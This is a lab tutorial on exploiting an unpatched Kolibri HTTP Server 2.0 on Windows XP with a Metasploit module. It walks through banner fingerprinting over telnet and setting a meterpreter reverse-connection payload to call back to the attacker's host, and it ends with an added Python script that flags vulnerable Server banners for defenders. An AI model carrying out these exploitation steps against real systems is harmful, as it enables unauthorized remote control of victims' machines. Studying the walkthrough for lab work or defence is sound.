Type : Tutorial
Level : Easy
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows XP SP3
Tested Vulnerable Application : Kolibri 2.0
Exploit Credit : mr_me, The_Leader
Another zero-day exploit has been found in Kolibri HTTP Web Server. This exploit was actually added to the Metasploit Framework as a module on 2011-08-03, but so far there has been no fix or update from the Kolibri developer.
1. Metasploit Framework
2. Kolibri HTTP Server 2.0 (download below)
3. Kolibri HTTP exploit (download link)
Attacker IP address : 192.168.8.93
Victim IP address : 192.168.8.94
1. Download the kolibri_http.rb exploit from the link above. For testing purposes I've also included a link to download the vulnerable Kolibri web server 2.0, so you can try it in your own lab.
Copy kolibri_http.rb to the following folder (I'm using BackTrack 5 R1):
2. To determine which type of server is running, we can do a simple fingerprint by telnetting to the remote host on the specified port. In this case the victim's Kolibri HTTP server was running on port 8080, although a web server usually runs on port 80.
telnet 192.168.8.94 8080
       ^            ^
       |            port
       remote ip address
3. Next, prepare the exploit against the vulnerable Kolibri web server by selecting the exploit we added in step 1. For this exploit I'm using the meterpreter payload.
4. Set the options needed to run the exploit. To view all the available options for this exploit and payload, just run the show options command.
set rhost 192.168.8.94 --> the target IP address
set rport 8080 --> the target port on which the Kolibri web server runs
set lhost 192.168.8.93 --> our local IP address to receive the reverse connection from the victim
set lport 443 --> local port to handle the reverse connection from the victim
5. Once everything is set up correctly, run the exploit with the exploit command and see whether it succeeds.
1. As of the date I wrote this tutorial (2011-10-21), the Kolibri web server still has no update, so the exploit is still a zero-day.
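With no fixed version available, the fingerprint from step 2 is also how a defender finds hosts that still run this server. The following is an added example, not part of the original tutorial or the Metasploit module: it parses saved HTTP responses (such as the output of the telnet check) and flags any whose Server header names Kolibri 2.0. The banner spelling "kolibri-2.0", the function names and the sample captures are assumptions constructed for illustration.

```python
import re

# Product/version the page reports as vulnerable (Kolibri 2.0). The exact
# banner spelling "kolibri-2.0" is an assumption, so match it loosely.
VULNERABLE = re.compile(r"kolibri[-/ ]?2\.0\b", re.IGNORECASE)


def server_header(raw: bytes):
    """Return the Server header value from a raw HTTP response, or None."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.replace("\r\n", "\n").split("\n")
    if not lines or not lines[0].startswith("HTTP/"):
        return None  # not an HTTP response (some other service on the port)
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "server":  # header names are case-insensitive
            return value.strip()
    return None


def classify(raw: bytes) -> str:
    """Label one captured response: 'vulnerable', 'other' or 'unknown'."""
    banner = server_header(raw)
    if banner is None:
        return "unknown"  # header stripped or non-HTTP: verify by hand
    return "vulnerable" if VULNERABLE.search(banner) else "other"


def audit(captures: dict) -> dict:
    """Map 'host:port' -> (label, banner) for every captured response."""
    return {t: (classify(r), server_header(r)) for t, r in captures.items()}


# Constructed sample captures (not real output). Only 192.168.8.94:8080 is
# from the tutorial's lab; the other hosts are hypothetical.
SAMPLES = {
    "192.168.8.94:8080": b"HTTP/1.1 200 OK\r\nServer: kolibri-2.0\r\nContent-Length: 0\r\n\r\n",
    "192.168.8.95:80": b"HTTP/1.1 200 OK\r\nserver: Apache/2.2.14 (Ubuntu)\r\n\r\n<html>",
    "192.168.8.96:8080": b"HTTP/1.1 403 Forbidden\r\nContent-Type: text/html\r\n\r\n",
    "192.168.8.97:22": b"SSH-2.0-OpenSSH_5.3\r\n",
}

if __name__ == "__main__":
    for target, (label, banner) in sorted(audit(SAMPLES).items()):
        print(f"{target:20} {label:10} {banner or '-'}")
```

A host labelled "unknown" is not cleared: the Server header can be removed or changed by a proxy, so those hosts need a manual check.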
Hope it's useful 🙂